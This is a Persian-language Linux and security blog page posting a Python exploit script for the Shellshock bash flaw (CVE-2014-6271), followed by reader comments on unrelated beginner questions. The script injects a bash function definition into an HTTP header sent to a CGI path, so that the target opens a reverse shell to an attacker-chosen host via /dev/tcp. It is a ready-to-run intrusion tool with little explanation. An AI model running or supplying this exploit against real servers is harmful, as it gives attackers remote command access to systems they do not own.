Google+

آموزش لینوکس و امنیت

مرجع آموزش لینوکس و امنیت پارسی

آموزش لینوکس و امنیت

مرجع آموزش لینوکس و امنیت پارسی

    #
    #CVE-2014-6271 cgi-bin reverse shell
    #
     
    import httplib,urllib,sys
     
    if (len(sys.argv)<4):
            print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
            print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
            exit(0)
     
    conn = httplib.HTTPConnection(sys.argv[1])
    reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
     
    headers = {"Content-type": "application/x-www-form-urlencoded",
            "test":reverse_shell }
    conn.request("GET",sys.argv[2],headers=headers)
    res = conn.getresponse()
    print res.status, res.reason
    data = res.read()
    print data

نظرات (۶)

سلام مهندس این اسکریپت چیکار میکنه ؟میشه لطف کنی یه توضیحی بدی؟
ممنون و موفق باشی
پاسخ:
آدرس صفحات cgi رو برای نقص امنیتی bash چک میکنه
سلام استاد ببخشید من اخرش متوجه نشدم که وقتی میگن لینوکس اپن سورسه یعنی چی؟نمیتونم این جمله رو خیلی خوب درک کنم. میشه چن تا مثال برام بزنید؟
پاسخ:
یعنی سورس برنامه در دسترس همه هست ولی ویندوز و مک کد های کامپایل شده رو بیرون میدن
خوب حالا چ طوری میشه به این سورس ها دسترسی پیدا کرد؟چ دستوری تو محیط کامند بنویسیم؟
پاسخ:
سورس چه برنامه ای رو میخواین؟

والا من نمیدونم استاد لطفا خودتون یکی رو بگید؟
مگه منظور از اپن سورس بودن لینوکس در دسترس بودن کد های سیستم عامل نیست؟
پس چرا گفتید سورس چه برنامه ای رو میخواید؟من منظورم این بود که چ طور میشه به کدهای خود سیستم عامل دسترسی پیدا کرد
پاسخ:
برای خود کرنل kernel.org
و برنامه ها:
sourceforge.net
github.com
سلام استاد
متاسفانه هر کاری کردی یو اس بی وای فای در کالی درس نشد)داخل محیط ویندوز کار میکنه (
کالی رو ماشین نصبه و روی ویندوز کامل کار میکنه ولی وقتی به کالی وصل میکنمش نمیتونه بشناسه
http://s5.picofile.com/file/8145006742/Capture.PNG
پاسخ:
فقط یه سری های خاص کار میکنن - قبل از خرید باید با یه جستجو لیست دیوایس هایی که ساپورت می شن رو پیدا کنید
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
تجدید کد امنیتی